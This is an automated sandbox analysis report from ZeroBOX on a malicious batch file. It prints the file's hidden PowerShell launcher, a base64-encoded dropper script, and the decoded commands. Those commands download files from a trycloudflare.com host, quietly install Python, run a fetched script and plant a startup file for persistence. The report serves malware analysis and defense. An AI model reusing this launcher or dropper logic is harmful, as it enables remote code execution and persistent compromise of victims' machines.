Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 23, 2025, 10:08 a.m.	April 23, 2025, 10:15 a.m.

Size	3.5KB
Type	DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5	`fcbebab50efe0c09cafacca4f008e31d`
SHA256	`7b7caef32f7a2cc066ead6fa099b8882082b39417638fd9175f72c5207bcb1a0`
CRC32	`933BEF9D`
ssdeep	`96:zr+HmGjUOjwjo61c6VWRLGLUArzfGmBJBfgaf:2wf1lstu/rX4O`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IALlcyCOe" C:\Users\test22\AppData\Local\Temp\sch.bat
2540
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\sch.bat
  2612
  - powershell.exe powershell -NoP -NonI -W Hidden -Exec Bypass -C "$b64='QGVjaG8gb2ZmDQpzZXRsb2NhbA0KDQo6OiBTZXQgdGhlIGJhc2UgVVJMIGZvciBkb3dubG9hZHMNCnNldCAiYmFzZVVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20iDQoNCjo6IERvd25sb2FkIHRoZSBmaWxlIChlLmcuLCBpbWFnZSBvciBXb3JkIGRvY3VtZW50KQ0Kc2V0ICJmaWxlVXJsPSViYXNlVXJsJS9wZGYvc2NoLnBkZiINCnNldCAiZmlsZURlc3RpbmF0aW9uPSVURU1QJVxzY2gucGRmIg0KZWNobyBEb3dubG9hZGluZyBmaWxlLi4uDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgW05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbCA9IFtOZXQuU2VjdXJpdHlQcm90b2NvbFR5cGVdOjpUbHMxMjsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWZpbGVVcmwlJyAtT3V0RmlsZSAnJWZpbGVEZXN0aW5hdGlvbiUnIH0iDQoNCjo6IE9wZW4gdGhlIGZpbGUNCmVjaG8gT3BlbmluZyBmaWxlOiAlZmlsZURlc3RpbmF0aW9uJQ0Kc3RhcnQgIiIgIiVmaWxlRGVzdGluYXRpb24lIg0KDQo6OiBTZXQgUHl0aG9uIGluc3RhbGxlciBVUkwgYW5kIGRvd25sb2FkIGxvY2F0aW9uDQpzZXQgInB5dGhvblVybD1odHRwczovL2FyYml0cmFyeS1icnV0YWwtZGVzcGVyYXRlLXBhZ2UudHJ5Y2xvdWRmbGFyZS5jb20vcHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgInB5dGhvbkluc3RhbGxlcj0lQVBQREFUQSVccHl0aG9uLTMuMTIuNS1hbWQ2NC5leGUiDQpzZXQgImluc3RhbGxEaXI9JUFQUERBVEElXFB5dGhvblxQeXRob24zLjEyLjUiDQoNCjo6IERvd25sb2FkIHRoZSBQeXRob24gaW5zdGFsbGVyDQplY2hvIERvd25sb2FkaW5nIFB5dGhvbiBpbnN0YWxsZXIuLi4NCnBvd2Vyc2hlbGwgLUNvbW1hbmQgIiYgeyBbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICclcHl0aG9uVXJsJScgLU91dEZpbGUgJyVweXRob25JbnN0YWxsZXIlJyB9Ig0KDQo6OiBJbnN0YWxsIFB5dGhvbiB3aXRoIHVzZXIgcHJpdmlsZWdlcyAobm8gYWRtaW4gcmVxdWlyZWQpDQplY2hvIEluc3RhbGxpbmcgUHl0aG9uIDMuMTIuNS4uLg0KJXB5dGhvbkluc3RhbGxlciUgL3F1aWV0IEluc3RhbGxBbGxVc2Vycz0wIFRhcmdldERpcj0laW5zdGFsbERpciUgUHJlcGVuZFBhdGg9MQ0KaWYgJUVSUk9STEVWRUwlIG5lcSAwICgNCiAgICBlY2hvIFB5dGhvbiBpbnN0YWxsYXRpb24gZmFpbGVkLg0KICAgIGV4aXQgL2IgMQ0KKQ0KDQo6OiBDbGVhbiB1cCBpbnN0YWxsZXINCmRlbCAlcHl0aG9uSW5zdGFsbGVyJQ0KDQo6OiBEb3dubG9hZCBQeXRob24gc2NyaXB0cyB0byB0aGUgUHl0aG9uIGluc3RhbGxhdGlvbiBkaXJlY3RvcnkNCmVjaG8gRG93bmxvYWRpbmcgUHl0aG9uIHNjcmlwdHMuLi4NCmlmIG5vdCBleGlzdCAiJWluc3RhbGxEaXIlIiBta2RpciAiJWluc3RhbGxEaXIlIg0KDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWJhc2VVcmwlLzkxMS5weScgLU91dEZpbGUgJyVpbnN0YWxsRGlyJVw5MTEucHknIH0iDQoNCjo6IE5hdmlnYXRlIHRvIHRoZSBQeXRob24gaW5zdGFsbGF0aW9uIGRpcmVjdG9yeSBhbmQgcnVuIHRoZSBzY3JpcHRzIGluIHRoZSBiYWNrZ3JvdW5kDQplY2hvIFJ1bm5pbmcgUHl0aG9uIHNjcmlwdHMgaW4gdGhlIGJhY2tncm91bmQuLi4NCmNkIC9kICIlaW5zdGFsbERpciUiDQpzdGFydCAvYiAiIiAiJWluc3RhbGxEaXIlXHB5dGhvbi5leGUiIDkxMS5weQ0KDQo6OiBEb3dubG9hZCB0aGUgc3RhcnQuY21kIGZpbGUgYW5kIHBsYWNlIGl0IGluIHRoZSBzdGFydHVwIGZvbGRlcg0KZWNobyBEb3dubG9hZGluZyBzdGFydC5jbWQgZmlsZS4uLg0Kc2V0ICJjbWRVcmw9JWJhc2VVcmwlL3N0YXJ0LmNtZCINCnNldCAiY21kRGVzdGluYXRpb249JUFQUERBVEElXHVwZGF0ZS5jbWQiDQpwb3dlcnNoZWxsIC1Db21tYW5kICImIHsgSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnJWNtZFVybCUnIC1PdXRGaWxlICclY21kRGVzdGluYXRpb24lJyB9Ig0KDQo6OiBNb3ZlIHN0YXJ0LmNtZCB0byB0aGUgc3RhcnR1cCBmb2xkZXINCmVjaG8gTW92aW5nIHN0YXJ0LmNtZCBmaWxlIHRvIHN0YXJ0dXAgZm9sZGVyLi4uDQpzZXQgInN0YXJ0dXBGb2xkZXI9JUFQUERBVEElXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cCINCm1vdmUgIiVjbWREZXN0aW5hdGlvbiUiICIlc3RhcnR1cEZvbGRlciUiDQoNCjo6IENsZWFuIHVwDQplY2hvIENsZWFuaW5nIHVwLi4uDQoNCjo6IEhpZGUgdGhlIFB5dGhvbiBpbnN0YWxsYXRpb24gZm9sZGVyDQphdHRyaWIgK2ggIiVpbnN0YWxsRGlyJSINCg0KOjogU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQNCmVjaG8gU2NyaXB0IGV4ZWN1dGlvbiBjb21wbGV0ZWQuDQplbmRsb2NhbA==';$b=[System.Convert]::FromBase64String($b64);$s=[System.Text.Encoding]::ASCII.GetString($b);$f='obf-sch_decoded.bat';Set-Content -Path $f -Value $s;Start-Process $f -WindowStyle Hidden"
    2700
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\obf-sch_decoded.bat" "
      2816
      - powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.trycloudflare.com/pdf/sch.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\sch.pdf' }"
        2896
      - powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.trycloudflare.com/python-3.12.5-amd64.exe' -OutFile 'C:\Users\test22\AppData\Roaming\python-3.12.5-amd64.exe' }"
        3056

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (18 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 23, 2025, 10:08 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 23, 2025, 10:08 a.m.			0	0
IsDebuggerPresent April 23, 2025, 10:08 a.m.			0	0
IsDebuggerPresent April 23, 2025, 10:08 a.m.			0	0

Command line console output was observed (50 out of 51 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: Downloading file... console_handle: 0x00000007	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: Opening file: C:\Users\test22\AppData\Local\Temp\sch.pdf console_handle: 0x00000007	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: The system cannot find the file C:\Users\test22\AppData\Local\Temp\sch.pdf. console_handle: 0x0000000b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: Downloading Python installer... console_handle: 0x00000007	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: Installing Python 3.12.5... console_handle: 0x00000007	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: 'C:\Users\test22\AppData\Roaming\python-3.12.5-amd64.exe' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: Python installation failed. console_handle: 0x00000007	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: At line:1 char:32 console_handle: 0x00000053	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + & { [Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProtocol console_handle: 0x0000005f	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: Type]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.t console_handle: 0x0000006b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: rycloudflare.com/pdf/sch.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\sch. console_handle: 0x00000077	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: pdf' } console_handle: 0x00000083	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000008f	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000009b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x000000bb	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x000000c7	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x000000d3	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: At line:1 char:103 console_handle: 0x000000df	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + & { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]: console_handle: 0x000000eb	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: :Tls12; Invoke-WebRequest <<<< -Uri 'https://arbitrary-brutal-desperate-page.t console_handle: 0x000000f7	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: rycloudflare.com/pdf/sch.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\sch. console_handle: 0x00000103	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: pdf' } console_handle: 0x0000010f	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x0000011b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: ommandNotFoundException console_handle: 0x00000127	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000133	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: At line:1 char:32 console_handle: 0x00000053	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + & { [Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProtocol console_handle: 0x0000005f	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: Type]::Tls12; Invoke-WebRequest -Uri 'https://arbitrary-brutal-desperate-page.t console_handle: 0x0000006b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: rycloudflare.com/python-3.12.5-amd64.exe' -OutFile 'C:\Users\test22\AppData\Roa console_handle: 0x00000077	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: ming\python-3.12.5-amd64.exe' } console_handle: 0x00000083	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000008f	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000009b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x000000bb	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x000000c7	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x000000d3	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: At line:1 char:103 console_handle: 0x000000df	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + & { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]: console_handle: 0x000000eb	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: :Tls12; Invoke-WebRequest <<<< -Uri 'https://arbitrary-brutal-desperate-page.t console_handle: 0x000000f7	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: rycloudflare.com/python-3.12.5-amd64.exe' -OutFile 'C:\Users\test22\AppData\Roa console_handle: 0x00000103	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: ming\python-3.12.5-amd64.exe' } console_handle: 0x0000010f	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x0000011b	1	1
WriteConsoleW April 23, 2025, 10:08 a.m.	buffer: ommandNotFoundException console_handle: 0x00000127	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 143 events)

Time & API	Arguments	Status	Return
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00684cd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006856d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006856d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006856d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006856d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006856d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006856d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00684b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00684b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00684b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006853d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685850 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00685790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002baa18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bb2d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 23, 2025, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002bb2d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 23, 2025, 10:08 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 420 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0229a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02292000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 23, 2025, 10:08 a.m.	process_identifier: 2700 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
